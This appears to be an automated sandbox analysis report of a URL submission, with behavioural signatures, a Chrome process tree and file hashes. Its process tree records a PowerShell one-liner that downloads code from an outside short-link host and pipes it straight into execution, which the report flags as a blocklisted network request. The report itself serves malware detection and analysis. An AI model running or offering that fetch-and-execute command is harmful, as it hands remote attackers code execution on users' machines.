Resubmissions
09-09-2024 19:47
240909-yhlkaawgqp 316-08-2024 15:24
240816-stchvswbkk 319-07-2024 09:10
240719-k46wfswhja 119-07-2024 09:10
240719-k41z7stalq 109-07-2024 04:19
240709-exzwnswbnr 808-07-2024 07:13
240708-h2an5azgkg 607-07-2024 10:00
240707-l1l8ba1gqb 1007-07-2024 09:59
240707-l1e41a1gpc 106-07-2024 07:41
240706-jjdhqstcpg 406-07-2024 06:14
240706-gzq3na1blh 1Analysis
-
max time kernel
157s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
09-07-2024 04:19
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com
Resource
win10v2004-20240704-en
General
-
Target
https://github.com
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 74 2676 powershell.exe 76 2676 powershell.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133649724126205223" chrome.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 4912 chrome.exe 4912 chrome.exe 2676 powershell.exe 2676 powershell.exe 2676 powershell.exe 3116 chrome.exe 3116 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
pid Process 4912 chrome.exe 4912 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe Token: SeShutdownPrivilege 4912 chrome.exe Token: SeCreatePagefilePrivilege 4912 chrome.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe 4912 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4912 wrote to memory of 372 4912 chrome.exe 82 PID 4912 wrote to memory of 372 4912 chrome.exe 82 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1456 4912 chrome.exe 85 PID 4912 wrote to memory of 1288 4912 chrome.exe 86 PID 4912 wrote to memory of 1288 4912 chrome.exe 86 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87 PID 4912 wrote to memory of 912 4912 chrome.exe 87
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff93365ab58,0x7ff93365ab68,0x7ff93365ab782⤵PID:372
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1656 --field-trial-handle=1872,i,6760965269555773801,15795961159699864801,131072 /prefetch:22⤵PID:1456
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1872,i,6760965269555773801,15795961159699864801,131072 /prefetch:82⤵PID:1288
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1872,i,6760965269555773801,15795961159699864801,131072 /prefetch:82⤵PID:912
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3068 --field-trial-handle=1872,i,6760965269555773801,15795961159699864801,131072 /prefetch:12⤵PID:2612
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3084 --field-trial-handle=1872,i,6760965269555773801,15795961159699864801,131072 /prefetch:12⤵PID:740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4260 --field-trial-handle=1872,i,6760965269555773801,15795961159699864801,131072 /prefetch:82⤵PID:4400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4112 --field-trial-handle=1872,i,6760965269555773801,15795961159699864801,131072 /prefetch:82⤵PID:4944
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4788 --field-trial-handle=1872,i,6760965269555773801,15795961159699864801,131072 /prefetch:82⤵PID:4996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=924 --field-trial-handle=1872,i,6760965269555773801,15795961159699864801,131072 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:3116
-
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵PID:2096
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"1⤵PID:4840
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c irm "https://707.su/K4J | iex"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:2676
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD592e362a3a8ac1a36d511bc5174d42396
SHA1a917770d917d64da69c45b92256c8ab341fd49e1
SHA2567adc56b5dbcee04d9b0c8ff15904f41393be7126d66f9c6cafeb48135bc1ae93
SHA51279b5ef3f666d81db4537be3a32d48de0191799aa1a99e0ca85dfa0198b0f8f74a4e4494e51e60893cdb0cae75ea771c526de96abecbbf0bd9e0f9f32cedc34b0
-
Filesize
1KB
MD5aea659379e4f9358c280408dfbf2de5a
SHA145a15f0b03f650b053ad2e60e9058911a03536b3
SHA256168d6bf6092685e122288a1b03dba79ff2be76a016e5c12c976c31077b737bce
SHA5122220133fe53af0709b8578a4eb0ce55359883c2999201ffb29baa14a92a1301eeb5c5de96b911075b22ae9a1a41a4dac51f1a9c448d51a000e2b51730fb093c9
-
Filesize
1KB
MD50a4b52dab5a5f4e9bf1d8385871fa0cf
SHA1926fa577793dab19f132e737a7ef696e7c178571
SHA25618822a41d5c9972e99dbb489c53d26d50ed9c9925a1f026397207a756ca9795e
SHA512583afe21f8d1e44f2a151beffef5a5e90754e4330a1f351bdf91d9862539c740ab623332272e70bf2ca4ac02aee9eb64b36b21f6899601b012fef629c150da4d
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
1KB
MD5462bd1a7580e431f3551d4c9bb0fdf6b
SHA14cbcaf03e9cb4cf805423811c3f2b4ce43185e83
SHA2562ce026e45c14cb9ad67ab17e0f8257ddc3696df97901f7e6ff8626b9088d0803
SHA51219dfaef9b8f0c3a830a43ebd0929635ac80b38363b600df518d6f8e1cca8a8262d385b721e39d87c935d7cf17c88e9d170475cd87c751111be9e2e41c913b6c1
-
Filesize
7KB
MD50091215ba7365507ca6607459f649bb1
SHA129cc653ad4850f4c13aa810e34fe7b418d406fb2
SHA2561efcadcbd8d781bfcd704885bbc903a4e401687146a9208e146ea6a0ef4dded1
SHA512ff3b0ef4398d4feb06c43566fb0384acc8201b7a7a386ee54a96a58f9aec3f79aab307571eb8fd80cdf8bbf8445b256532c5d9340751872214698f21dd1bc26f
-
Filesize
144KB
MD559a5c901b9c5b6e91e499ac53a312253
SHA1240dd61a165f4a6dc1f6ee4de802e7014c34d376
SHA256fbef9df9a817ee181805be201ddb7fd054a8ac796e8a254b5d65e6a2b7f6385a
SHA5126b04a86b8d92baf49c7918ee9064a03d244850ede6dfc894e0f1521aa49fe3d168580b55f62a6401d7a5c8de25691b2672e148f836ee0fa1e2706c2bc19e2a9b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82